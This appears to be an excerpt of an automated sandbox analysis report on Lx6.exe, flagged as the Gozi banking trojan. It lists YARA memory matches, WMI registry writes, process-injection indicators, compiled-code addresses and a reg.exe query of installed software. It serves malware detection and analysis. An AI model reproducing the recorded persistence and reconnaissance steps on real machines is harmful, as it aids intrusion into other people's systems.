Source: 00000004.00000003.448346739.0000021F4E42C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: 0000002D.00000003.797117196.00000191D3DAC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: 00000000.00000003.344925782.0000000001318000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
Source: 00000000.00000003.344925782.0000000001318000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: 0000002D.00000003.712648005.00000191D3DAC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: 00000029.00000003.708638922.000001CEDBA7C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: 00000023.00000002.685282476.0000000003558000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: 0000001F.00000002.856104544.000001489B502000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: 00000029.00000002.721107955.000001CEDBA7C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: 00000000.00000003.345194769.0000000001318000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
Source: 00000000.00000003.345194769.0000000001318000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: 00000000.00000003.345092170.0000000001318000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
Source: 00000000.00000003.345092170.0000000001318000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: 00000023.00000003.682986739.0000000003558000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: 00000058.00000003.814825751.0000024EF5BDC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: 00000058.00000003.803878408.0000024EF5BDC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: 00000023.00000003.683117141.0000000003558000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: 0000003E.00000003.767939746.000001993459C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: 0000003E.00000003.765039957.000001993459C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: 0000003E.00000003.765207667.000001993459C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: 00000059.00000002.827171942.000001AF8BC9C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: 00000023.00000003.683052464.0000000003558000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: 0000003E.00000003.767821170.000001993459C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: 00000000.00000003.344972569.0000000001318000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
Source: 00000000.00000003.344972569.0000000001318000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: 00000023.00000003.682539634.0000000003558000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: 00000000.00000003.345107606.0000000001318000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
Source: 00000000.00000003.345107606.0000000001318000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: 00000023.00000003.682736014.0000000003558000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: 0000002D.00000003.712982128.00000191D3DAC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: 00000043.00000002.778497815.000001FA9DD8C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: 00000058.00000003.814713525.0000024EF5BDC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: 00000013.00000002.860622856.000002240CD02000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: 00000000.00000003.345011461.0000000001318000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
Source: 00000000.00000003.345011461.0000000001318000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: 00000059.00000003.822550991.000001AF8BC9C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: 00000029.00000003.705598553.000001CEDBA7C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: 00000059.00000003.822358925.000001AF8BC9C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: 0000002D.00000002.856230458.00000191D3DAC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: 00000029.00000003.705458137.000001CEDBA7C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: 00000023.00000003.682832881.0000000003558000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: 00000043.00000003.775181381.000001FA9DD8C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: 00000058.00000003.803740044.0000024EF5BDC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: 00000000.00000003.451792745.0000000003F08000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: 00000000.00000003.344881693.0000000001318000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
Source: 00000000.00000003.344881693.0000000001318000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: 00000000.00000003.344788105.0000000001318000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
Source: 00000000.00000003.344788105.0000000001318000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: 00000029.00000003.708468891.000001CEDBA7C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: 00000043.00000003.775368587.000001FA9DD8C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: 00000023.00000003.682410000.0000000003558000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: 00000000.00000002.498174750.0000000001318000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
Source: 00000000.00000002.498174750.0000000001318000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: 0000001B.00000002.858783348.000001D023E02000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: 00000023.00000003.682621929.0000000003558000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: 00000000.00000003.442938704.0000000003F08000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: 0000003E.00000002.795032491.000001993459C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: 00000023.00000003.683222673.0000000003558000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: Process Memory Space: Lx6.exe PID: 1172, type: MEMORYSTR Matched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
Source: Process Memory Space: Lx6.exe PID: 1172, type: MEMORYSTR Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: Process Memory Space: powershell.exe PID: 4292, type: MEMORYSTR Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 4292, type: MEMORYSTR Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: Process Memory Space: RuntimeBroker.exe PID: 3124, type: MEMORYSTR Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: Process Memory Space: RuntimeBroker.exe PID: 4372, type: MEMORYSTR Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: Process Memory Space: RuntimeBroker.exe PID: 4552, type: MEMORYSTR Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: Process Memory Space: cmd.exe PID: 5832, type: MEMORYSTR Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: Process Memory Space: cmd.exe PID: 1920, type: MEMORYSTR Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: Process Memory Space: powershell.exe PID: 6064, type: MEMORYSTR Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 6064, type: MEMORYSTR Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: Process Memory Space: csc.exe PID: 5836, type: MEMORYSTR Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: Process Memory Space: cvtres.exe PID: 1716, type: MEMORYSTR Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: Process Memory Space: csc.exe PID: 3536, type: MEMORYSTR Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: Process Memory Space: cvtres.exe PID: 5240, type: MEMORYSTR Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: C:\Users\user\Desktop\Lx6.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Users\user\Desktop\Lx6.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Users\user\Desktop\Lx6.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Users\user\Desktop\Lx6.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Users\user\Desktop\Lx6.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::CreateKey
Source: C:\Users\user\Desktop\Lx6.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Users\user\Desktop\Lx6.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Users\user\Desktop\Lx6.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetBinaryValue
Source: C:\Users\user\Desktop\Lx6.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Users\user\Desktop\Lx6.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Users\user\Desktop\Lx6.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Users\user\Desktop\Lx6.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Users\user\Desktop\Lx6.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Users\user\Desktop\Lx6.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Users\user\Desktop\Lx6.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Users\user\Desktop\Lx6.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Users\user\Desktop\Lx6.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Users\user\Desktop\Lx6.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Users\user\Desktop\Lx6.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\System32\conhost.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\System32\conhost.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\conhost.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\System32\conhost.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\conhost.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\conhost.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\conhost.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\System32\conhost.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Code function: 62_2_0000019933FBAE38 62_2_0000019933FBAE38
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Code function: 62_2_0000019933FB45BC 62_2_0000019933FB45BC
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Code function: 62_2_0000019933FA3DBC 62_2_0000019933FA3DBC
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Code function: 62_2_0000019933F975A4 62_2_0000019933F975A4
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Code function: 62_2_0000019933FB2578 62_2_0000019933FB2578
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Code function: 62_2_0000019933FB3D70 62_2_0000019933FB3D70
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Code function: 62_2_0000019933FAED64 62_2_0000019933FAED64
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Code function: 62_2_0000019933F9CC54 62_2_0000019933F9CC54
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Code function: 62_2_0000019933F96458 62_2_0000019933F96458
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Code function: 62_2_0000019933FAE434 62_2_0000019933FAE434
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Code function: 62_2_0000019933FA6428 62_2_0000019933FA6428
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Code function: 62_2_0000019933F9E388 62_2_0000019933F9E388
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Code function: 62_2_0000019933FA8B60 62_2_0000019933FA8B60
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Code function: 62_2_0000019933FABB44 62_2_0000019933FABB44
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Code function: 62_2_0000019933FB5B10 62_2_0000019933FB5B10
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Code function: 62_2_0000019933FAB304 62_2_0000019933FAB304
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Code function: 62_2_0000019933F992E4 62_2_0000019933F992E4
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Code function: 62_2_0000019933F9C29C 62_2_0000019933F9C29C
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Code function: 62_2_0000019933FBB28C 62_2_0000019933FBB28C
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe Code function: 67_2_000001FA9D6F8454 67_2_000001FA9D6F8454
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe Code function: 67_2_000001FA9D6F1AE8 67_2_000001FA9D6F1AE8
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe Code function: 67_2_000001FA9D719000 67_2_000001FA9D719000
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe Code function: 67_2_000001FA9D715FC0 67_2_000001FA9D715FC0
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe Code function: 67_2_000001FA9D6F5FD0 67_2_000001FA9D6F5FD0
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe Code function: 67_2_000001FA9D708890 67_2_000001FA9D708890
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe Code function: 67_2_000001FA9D713878 67_2_000001FA9D713878
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe Code function: 67_2_000001FA9D70B6F0 67_2_000001FA9D70B6F0
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe Code function: 67_2_000001FA9D6F77AC 67_2_000001FA9D6F77AC
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe Code function: 67_2_000001FA9D70D774 67_2_000001FA9D70D774
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe Code function: 67_2_000001FA9D6F4770 67_2_000001FA9D6F4770
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe Code function: 67_2_000001FA9D71321C 67_2_000001FA9D71321C
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe Code function: 67_2_000001FA9D700A0C 67_2_000001FA9D700A0C
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe Code function: 67_2_000001FA9D7051D0 67_2_000001FA9D7051D0
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe Code function: 67_2_000001FA9D6FC29C 67_2_000001FA9D6FC29C
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe Code function: 67_2_000001FA9D71B28C 67_2_000001FA9D71B28C
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe Code function: 67_2_000001FA9D7010BC 67_2_000001FA9D7010BC
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe Code function: 67_2_000001FA9D7188C8 67_2_000001FA9D7188C8
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe Code function: 67_2_000001FA9D70B16C 67_2_000001FA9D70B16C
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe Code function: 67_2_000001FA9D718174 67_2_000001FA9D718174
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe Code function: 67_2_000001FA9D719978 67_2_000001FA9D719978
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe Code function: 67_2_000001FA9D705954 67_2_000001FA9D705954
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe Code function: 67_2_000001FA9D70E434 67_2_000001FA9D70E434
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe Code function: 67_2_000001FA9D706428 67_2_000001FA9D706428
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe Code function: 67_2_000001FA9D6FCC54 67_2_000001FA9D6FCC54
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe Code function: 67_2_000001FA9D6F6458 67_2_000001FA9D6F6458
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe Code function: 67_2_000001FA9D715B10 67_2_000001FA9D715B10
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe Code function: 67_2_000001FA9D70B304 67_2_000001FA9D70B304
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe Code function: 67_2_000001FA9D6F92E4 67_2_000001FA9D6F92E4
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe Code function: 67_2_000001FA9D6FE388 67_2_000001FA9D6FE388
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe Code function: 67_2_000001FA9D708B60 67_2_000001FA9D708B60
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe Code function: 67_2_000001FA9D70BB44 67_2_000001FA9D70BB44
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe Code function: 67_2_000001FA9D71AE38 67_2_000001FA9D71AE38
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe Code function: 67_2_000001FA9D703DBC 67_2_000001FA9D703DBC
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe Code function: 67_2_000001FA9D7145BC 67_2_000001FA9D7145BC
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe Code function: 67_2_000001FA9D701E9C 67_2_000001FA9D701E9C
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe Code function: 67_2_000001FA9D706E4C 67_2_000001FA9D706E4C
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe Code function: 67_2_000001FA9D6F75A4 67_2_000001FA9D6F75A4
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe Code function: 67_2_000001FA9D713D70 67_2_000001FA9D713D70
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe Code function: 67_2_000001FA9D712578 67_2_000001FA9D712578
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe Code function: 67_2_000001FA9D70ED64 67_2_000001FA9D70ED64
Source: C:\Users\user\Desktop\Lx6.exe Code function: 0_2_0075C875 CreateProcessAsUserA, 0_2_0075C875
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe reg.exe query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s
Source: Lx6.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: 00000000.00000003.345037637.0000000001318000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
Source: 00000000.00000003.345037637.0000000001318000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 00000004.00000003.448346739.0000021F4E42C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 0000002D.00000003.797117196.00000191D3DAC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 00000000.00000003.344925782.0000000001318000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
Source: 00000000.00000003.344925782.0000000001318000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 0000002D.00000003.712648005.00000191D3DAC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 00000029.00000003.708638922.000001CEDBA7C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 00000023.00000002.685282476.0000000003558000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
